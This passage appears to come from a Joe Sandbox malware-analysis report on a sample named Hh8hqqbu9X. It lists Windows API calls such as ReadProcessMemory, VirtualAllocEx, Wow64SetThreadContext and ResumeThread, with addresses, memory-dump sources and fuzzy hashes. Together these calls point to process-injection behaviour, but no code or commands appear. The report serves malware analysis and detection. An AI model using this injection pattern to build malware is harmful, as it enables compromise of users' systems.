                                    • Instruction ID: 3839a72e2bea303ee4e8c31530540541ad80add357cedcb8b5741cf2e3c5827b
                                    • Opcode Fuzzy Hash: 362c2d41f98ae288511828a50ab5e1c14e5a75c6682a405608548e25caf74ea0
                                    • Instruction Fuzzy Hash: C52169B1D003499FDB10CFA9C985BDEBBF5FF48310F10882AE919A7240C778A954DBA0
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0182D606,?,?,?,?,?), ref: 0182D6C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2118448425.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1820000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 45e54530006848b31c5d6fc39577c7e77d4c2bd5df107fa89b7505d761b5e3b5
                                    • Instruction ID: 183744bd8101bc1f73d6f54702a3e2d216848cc0881535758ee1d03f59e37e1b
                                    • Opcode Fuzzy Hash: 45e54530006848b31c5d6fc39577c7e77d4c2bd5df107fa89b7505d761b5e3b5
                                    • Instruction Fuzzy Hash: 1721E3B5D00359AFDB10CF9AD984AEEBFF8EB48310F14841AE918A7310D374A954CFA5
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0182D606,?,?,?,?,?), ref: 0182D6C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2118448425.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1820000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: e29b6083d450a074e850b1335ede507b786012d7e65b4ad9c8b262f8653428f9
                                    • Instruction ID: 74fe504635d563e8204062ea8f42200ef9aac2bf1c690d25703e6d2b1104a5da
                                    • Opcode Fuzzy Hash: e29b6083d450a074e850b1335ede507b786012d7e65b4ad9c8b262f8653428f9
                                    • Instruction Fuzzy Hash: D821E3B5D002599FDB10CFAAE984ADEBFF5FB48310F14841AE958A3350D378A944CFA5
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05906D08
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: 88af7f55b1b10a1d32981ac65183fc00a6ad99e2371e2c23089203f15493ceb8
                                    • Instruction ID: ef81a047e64b4e36d34a9052032637c6eeec665f8faa70ffe0c799ce07c91682
                                    • Opcode Fuzzy Hash: 88af7f55b1b10a1d32981ac65183fc00a6ad99e2371e2c23089203f15493ceb8
                                    • Instruction Fuzzy Hash: 4B2128B1C003599FDB10DFAAD845AEEBBF5FF48310F10842AE919A7240C778A951DBA1
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05906C2E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 5205982de53ea7fc423333e5fa4661097ff04e6b36587c4f3543333efde79e2c
                                    • Instruction ID: 90543424ba033ffa757e97f3625512f4dc1aa6d0e63aa0e5cceb576e07ce19d9
                                    • Opcode Fuzzy Hash: 5205982de53ea7fc423333e5fa4661097ff04e6b36587c4f3543333efde79e2c
                                    • Instruction Fuzzy Hash: E52135B1D003098FDB10DFAAC4857AEBBF4EF88324F10842ED519A7240CB78A945CFA1
                                    APIs
                                    • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,0590ADD0,04294120,032DB5EC), ref: 0590AE61
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: EnumThreadWindows
                                    • String ID:
                                    • API String ID: 2941952884-0
                                    • Opcode ID: b22ddde15582b6d37b2fb4732cbf5278ed3baa479c28d0786357f55da5ae5dea
                                    • Instruction ID: 722cc3aa348dfff36d4801709dcca1c9ab53f9d61ff3b5b02ce517638b30c341
                                    • Opcode Fuzzy Hash: b22ddde15582b6d37b2fb4732cbf5278ed3baa479c28d0786357f55da5ae5dea
                                    • Instruction Fuzzy Hash: 50211AB1D002098FDB14DFAAC845BEEFBF9FB48310F148429D455A7290D778A945CFA1
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05906D08
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: b8d0f67b621fe199e38dbb1b97b042c5de81583e00751421a99d81166486bd21
                                    • Instruction ID: e9b878a6d74bcbeb66238e85a4cd19884c2cbe8fd455f77c24ca6b39362a9327
                                    • Opcode Fuzzy Hash: b8d0f67b621fe199e38dbb1b97b042c5de81583e00751421a99d81166486bd21
                                    • Instruction Fuzzy Hash: ED2125B1C003498FCB10CFA9D9856EEBBF5FF48310F10882EE919A7240C7389951DBA1
                                    APIs
                                    • PostMessageW.USER32(?,?,?,?), ref: 05900C9D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    • Opcode ID: e35026634082f92bd089114060b2547dd7d04c40675c005b0fbdde8816d6c592
                                    • Instruction ID: 6f4346559e7529c916f29e2999a922dd238df0cbca88645d2256618e4b39de17
                                    • Opcode Fuzzy Hash: e35026634082f92bd089114060b2547dd7d04c40675c005b0fbdde8816d6c592
                                    • Instruction Fuzzy Hash: F22158B5804349CFDB10CFA9D945BDABFF4FB09320F15845AE454A7291C338A945CBA5
                                    APIs
                                    • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,0590ADD0,04294120,032DB5EC), ref: 0590AE61
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: EnumThreadWindows
                                    • String ID:
                                    • API String ID: 2941952884-0
                                    • Opcode ID: 6263d7e03b3c4d5155fdde50157362f7596d00fd7b277a838f56c5f55ff2c707
                                    • Instruction ID: 4d91d8820b7499df6e21ec370fc26ab0ae90a71c56925a9d6dc5bce556a7ebdf
                                    • Opcode Fuzzy Hash: 6263d7e03b3c4d5155fdde50157362f7596d00fd7b277a838f56c5f55ff2c707
                                    • Instruction Fuzzy Hash: BC2118B1D0020A8FDB14DF9AC844BAEFBF9FB88310F14882AD455A7290D774A945CFA5
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05906C2E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: f6ab4388e48be9f6c0bacf2044c53b27dc6c4ce28cc9aa65af07991c539f2ced
                                    • Instruction ID: ce95888c885b5108003662c5a951d31db34780e9702859972de3fd6c271223d0
                                    • Opcode Fuzzy Hash: f6ab4388e48be9f6c0bacf2044c53b27dc6c4ce28cc9aa65af07991c539f2ced
                                    • Instruction Fuzzy Hash: 422137B1D003098FDB10DFA9C5857AEBBF4EF48325F10842ED519A7240CB789945CFA5
                                    APIs
                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,058ADEDA,?,?,?,?,?), ref: 058ADF7F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119848113.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_58a0000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: CreateFromIconResource
                                    • String ID:
                                    • API String ID: 3668623891-0
                                    • Opcode ID: 9ca1877fd299e078204b91fb9bceabe450038f71e6a01cdb2b9e067b0d0aa1a0
                                    • Instruction ID: 5f945c0b2fa289f6fb12a6b0f5668923f913f19b214beff32eda74e328562bd8
                                    • Opcode Fuzzy Hash: 9ca1877fd299e078204b91fb9bceabe450038f71e6a01cdb2b9e067b0d0aa1a0
                                    • Instruction Fuzzy Hash: 0F1126B2804349DFDB10CF9AD844BEEBFF8EB48310F14841AE919A7210C375A954DFA5
                                    APIs
                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,05902202,00000000,00000000,04294120,032DB5EC), ref: 05902650
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MessagePeek
                                    • String ID:
                                    • API String ID: 2222842502-0
                                    • Opcode ID: a3f644f59bcf8be04fd22d951cbc0e7eefe4fd996083ad5683b97e09adacefd1
                                    • Instruction ID: 9207a7e7cef23baa1088b346740d4693179742e0a059c75d6e23d12c6ad4182c
                                    • Opcode Fuzzy Hash: a3f644f59bcf8be04fd22d951cbc0e7eefe4fd996083ad5683b97e09adacefd1
                                    • Instruction Fuzzy Hash: 2711F9B5C04249DFDB10CF9AD588BDEBBF8FB48310F10842AE959A7251C378A944DFA5
                                    APIs
                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,05902202,00000000,00000000,04294120,032DB5EC), ref: 05902650
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MessagePeek
                                    • String ID:
                                    • API String ID: 2222842502-0
                                    • Opcode ID: 9be24b1af6ba88d3f05352919c3c7350fb0d1f6ce0b83b67476858240dbf0568
                                    • Instruction ID: a53f553e4a3d339ae2572f74680ff3fb3bacbfdb17cbcff880b892f543e931a3
                                    • Opcode Fuzzy Hash: 9be24b1af6ba88d3f05352919c3c7350fb0d1f6ce0b83b67476858240dbf0568
                                    • Instruction Fuzzy Hash: 6A11F6B5C00249DFDB10CF9AD544BEEBBF8FB48310F10842AE959A3250C378A944DFA5
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05906F7E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 0c43af702c18285852200afd1e8a8ef9ec8d3e15d13ed2e600a9691c87b540e6
                                    • Instruction ID: 304247f092e6b8df7a7b837e3da470b8b1a0bd36ca29af2c9a2bd894df037464
                                    • Opcode Fuzzy Hash: 0c43af702c18285852200afd1e8a8ef9ec8d3e15d13ed2e600a9691c87b540e6
                                    • Instruction Fuzzy Hash: 89115672C002498FCB20DFAAC845ADFBFF5EB88320F108819E519A7250C735A950DBA1
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05906F7E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 78748d4d7906701576d2a1bb76e1a8691103e602936d4c20eae2281b7d3f588c
                                    • Instruction ID: 1a49954a1cbd053e8d11b928dcae97643d81470c5f3667390c3dd7d22153d973
                                    • Opcode Fuzzy Hash: 78748d4d7906701576d2a1bb76e1a8691103e602936d4c20eae2281b7d3f588c
                                    • Instruction Fuzzy Hash: D21159B5C003498FCB10DFA9D5457EEBBF5AF48310F10881AE519A7250C735A550DBA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: d93cd89275272536f98c50495cd10e2116b51839717c08091a64557f7ffd6bdf
                                    • Instruction ID: fad0e5661968d04a82409750a280d28e084ee131cf30a4b64d2e17e5717b54ae
                                    • Opcode Fuzzy Hash: d93cd89275272536f98c50495cd10e2116b51839717c08091a64557f7ffd6bdf
                                    • Instruction Fuzzy Hash: 651128B1D003498FDB20DFAAD4457AFFBF8EB88324F20881AD519A7240C7796944CBA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 5156606a61727cfc1dc5ef2bbf15a324ff1b88cb6f71f5ebc574978204c9f048
                                    • Instruction ID: 3ce596d9acb04c1f4474f8d11a1626d230337420eaca8ba7cbe93191b6139966
                                    • Opcode Fuzzy Hash: 5156606a61727cfc1dc5ef2bbf15a324ff1b88cb6f71f5ebc574978204c9f048
                                    • Instruction Fuzzy Hash: D61125B5D003498FDB20DFA9D5457AEBBF4EF88324F20881AD519A7240CB39A944CBA5
                                    APIs
                                    • PostMessageW.USER32(?,?,?,?), ref: 05900C9D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    • Opcode ID: 2de1f3eb05215589d3196db9cb58771c498e0075d2d55cba431199885112b53c
                                    • Instruction ID: 08634434e9140a6e973e3ccfab07c652650317550ec026108254c1b106e85464
                                    • Opcode Fuzzy Hash: 2de1f3eb05215589d3196db9cb58771c498e0075d2d55cba431199885112b53c
                                    • Instruction Fuzzy Hash: E011F5B58003499FDB10CF9AD949BEEBBF8EB48320F10841AE954A3240D378A944DFA5
                                    APIs
                                    • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0590A028
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID:
                                    • API String ID: 1836367815-0
                                    • Opcode ID: 6d7ef5c925aeb56a066d5d1e85465c76648774eea85fde202c476296d4a084d0
                                    • Instruction ID: 0fdfc47a674cd1f4db949b8be539df102b74ed198a2dd30300baee353a58d935
                                    • Opcode Fuzzy Hash: 6d7ef5c925aeb56a066d5d1e85465c76648774eea85fde202c476296d4a084d0
                                    • Instruction Fuzzy Hash: 5D1116B58003499FDB20CF89D846BDEBFF4FB08310F108819E955A7250C3756944CF94
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0182AFBE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2118448425.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1820000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 656816b41a57ee98aada827dcaa46778c80ed694feba195853cc5c51560f8020
                                    • Instruction ID: 7eb796d88f784d43d1b9ca20d1a8ea2aae087f373020c5702b4fac698d3173ca
                                    • Opcode Fuzzy Hash: 656816b41a57ee98aada827dcaa46778c80ed694feba195853cc5c51560f8020
                                    • Instruction Fuzzy Hash: 871110B5C006498FDB14CF9AD444BDEFBF4EF88314F10841AD919A7A40C379A645CFA1
                                    APIs
                                    • SendMessageW.USER32(?,0000020A,?,?,?,?,?,?,058A3EB2,?,00000000,?), ref: 058AEA0D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119848113.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_58a0000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 01e05da8bdd4b249e587458ea0c2e033d008b47cb7ce83748b567e23e0c52255
                                    • Instruction ID: 7a7a9a0876f81b9cb2f2b67cf0856f74282846f915644954ae3348ea4b78bedb
                                    • Opcode Fuzzy Hash: 01e05da8bdd4b249e587458ea0c2e033d008b47cb7ce83748b567e23e0c52255
                                    • Instruction Fuzzy Hash: 7011F2B6800349DFDB10DF9AD588BDEBBF8FB48310F10881AE919A7250C375A944CFA5
                                    APIs
                                    • PostMessageW.USER32(?,00000018,00000001,?), ref: 058AF82D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119848113.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_58a0000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    • Opcode ID: 4ef5208e2cc057afb0b42e00903cdee7110847470a52aee6e23cf8f00af20cde
                                    • Instruction ID: 2362cf29e33189493b4210bc5c162a78b44255478c96d773c29c44108aba062b
                                    • Opcode Fuzzy Hash: 4ef5208e2cc057afb0b42e00903cdee7110847470a52aee6e23cf8f00af20cde
                                    • Instruction Fuzzy Hash: C611F5B58003499FDB10DF9AD485BDEBBF8FB48310F108419E955A7300C375A984CFA5
                                    APIs
                                    • SendMessageW.USER32(?,0000020A,?,?,?,?,?,?,058A3EB2,?,00000000,?), ref: 058AEA0D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119848113.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_58a0000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: c5f61592736a7d49bbc06623b3b6144bff25065544c38788a3ef0bfdcbd4245f
                                    • Instruction ID: 5edb47ddaa627f89e5d010b45f942ea7862332ca106b53859da3400d5a00854e
                                    • Opcode Fuzzy Hash: c5f61592736a7d49bbc06623b3b6144bff25065544c38788a3ef0bfdcbd4245f
                                    • Instruction Fuzzy Hash: D111F2B58003499FDB10DF9AD989BDEBFF8FB48310F10841AE918A3210C379A944CFA1
                                    APIs
                                    • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 058AE2DD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119848113.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_58a0000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: e425f2fc2890d3d2ff9c067c1373275b2347a884ed800b5c7eb18843af520d3d
                                    • Instruction ID: b58c7aed75b4900aaa87f3e104db932d0c1cb9095466e42ebeea6eaa229268ca
                                    • Opcode Fuzzy Hash: e425f2fc2890d3d2ff9c067c1373275b2347a884ed800b5c7eb18843af520d3d
                                    • Instruction Fuzzy Hash: 5E1106B5800349DFDB10DF99D484BDEBBF8FB48310F108819E955A7200D375A944CFA5
                                    APIs
                                    • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0590A028
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID:
                                    • API String ID: 1836367815-0
                                    • Opcode ID: 0fbb6e6807d40aaf79e03207bb6288fe41e67ebe21b9e7f5c7f649451ecef487
                                    • Instruction ID: 5afc93acd5ecb1ca81c6c11d9a6a1e116c0235abf0a49655315f021e1d243e9b
                                    • Opcode Fuzzy Hash: 0fbb6e6807d40aaf79e03207bb6288fe41e67ebe21b9e7f5c7f649451ecef487
                                    • Instruction Fuzzy Hash: A511F5B59103499FDB20CF99D84ABEEBFF4FB09310F10881AE955A7240C775A948CFA5
                                    APIs
                                    • PostMessageW.USER32(?,00000018,00000001,?), ref: 058AF82D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119848113.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_58a0000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    • Opcode ID: d000a19d0f44ede078fbecdf8befe24dcc7f6d07db70ba6efb97399b8e10aa74
                                    • Instruction ID: 88ac13df0e968e324c86fa25d5e50322e288a5fd6ee408c1a708f2d0eddbde65
                                    • Opcode Fuzzy Hash: d000a19d0f44ede078fbecdf8befe24dcc7f6d07db70ba6efb97399b8e10aa74
                                    • Instruction Fuzzy Hash: A911C2B58103499FDB10DF9AD589BDEBFF8FB48310F10841AE959A7240D375A984CFA1
                                    APIs
                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05902347), ref: 05902DE5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: DispatchMessage
                                    • String ID:
                                    • API String ID: 2061451462-0
                                    • Opcode ID: 360d0d1c0319d12731098b79679ba0116182a3bf9b79bd0c048c8da8a42c00b7
                                    • Instruction ID: 43a4704f2ab1a139f71926e240459bbf10a287920bd51116cc2bf135e977d7b8
                                    • Opcode Fuzzy Hash: 360d0d1c0319d12731098b79679ba0116182a3bf9b79bd0c048c8da8a42c00b7
                                    • Instruction Fuzzy Hash: BD11F2B5C046498FCB10DF9AE948BDEFBF4EB48314F10841AD519A7240D374A545CFA5
                                    APIs
                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05902347), ref: 05902DE5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: DispatchMessage
                                    • String ID:
                                    • API String ID: 2061451462-0
                                    • Opcode ID: b01e205a496d94d6b56e5bdb513fd738fcb62a6b91f9dcfb8fc1ef614352255a
                                    • Instruction ID: 27e505fcc1ff88d0549bfcf718240497a8f88b980c590934ff6925a11d5555ed
                                    • Opcode Fuzzy Hash: b01e205a496d94d6b56e5bdb513fd738fcb62a6b91f9dcfb8fc1ef614352255a
                                    • Instruction Fuzzy Hash: 3011F2B5C04649CFCB10DF9AD448B9EFBF8EB48314F10881AE919A7340D374A945CFA5
                                    APIs
                                    • OleInitialize.OLE32(00000000), ref: 05901E5D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: Initialize
                                    • String ID:
                                    • API String ID: 2538663250-0
                                    • Opcode ID: b87f2119de98794321e49f839ae72410b959e0a1c55a819c06cc1b0b4ce0317e
                                    • Instruction ID: 10e02337ec1607f6b0e2d2c19dbb3c98bd9faace7b0f13177284c7c3d0c290e9
                                    • Opcode Fuzzy Hash: b87f2119de98794321e49f839ae72410b959e0a1c55a819c06cc1b0b4ce0317e
                                    • Instruction Fuzzy Hash: 0E1115B5C003498FDB20DF9AD448B9EFBF8EB48310F10885AD519A7350C374A944CFA5
                                    APIs
                                    • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 058AE2DD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119848113.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_58a0000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: a208d7fea449cb64ed6ead8b8237a7aeba6a99444a5754d4ef9f893e33d55948
                                    • Instruction ID: 09fa0ad66a9192eefdd6d9dbad1e3d965ffa504840048b8e2d65a7e7897a1fc1
                                    • Opcode Fuzzy Hash: a208d7fea449cb64ed6ead8b8237a7aeba6a99444a5754d4ef9f893e33d55948
                                    • Instruction Fuzzy Hash: CF11F2B5800349CFDB10CF99D589BDEBBF8FB48310F10881AE958A7200C374A954CFA5
                                    APIs
                                    • OleInitialize.OLE32(00000000), ref: 05901E5D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: Initialize
                                    • String ID:
                                    • API String ID: 2538663250-0
                                    • Opcode ID: 2c894afe549713ac60ff027b6631047f1f1b73d87b6a43391e98e989905db4c4
                                    • Instruction ID: 787124844a6f136a24e220a1bf4d5fa342d503b6f207ecbda53b6b4daeab80f9
                                    • Opcode Fuzzy Hash: 2c894afe549713ac60ff027b6631047f1f1b73d87b6a43391e98e989905db4c4
                                    • Instruction Fuzzy Hash: E21112B5C00349CFDB10DF99D589BDEBBF4AB48314F20885AD519A7240C374A944CFA5
                                    APIs
                                    • CloseHandle.KERNELBASE(?), ref: 059086F0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 82ca26a3bafbe3c9d926545c2f65c32736fbe91824007bfa158468b9332e5460
                                    • Instruction ID: 9e515ef8eb66931299832f8768608d84dd731165cf732ae6a50e0dc4f671e261
                                    • Opcode Fuzzy Hash: 82ca26a3bafbe3c9d926545c2f65c32736fbe91824007bfa158468b9332e5460
                                    • Instruction Fuzzy Hash: 4D2175B2900308CFCB10DF99D488A9ABBF8FF48310F11846AE958A7350C739E944CFA1
                                    APIs
                                    • CloseHandle.KERNELBASE(?), ref: 059086F0
                                    Memory Dump Source
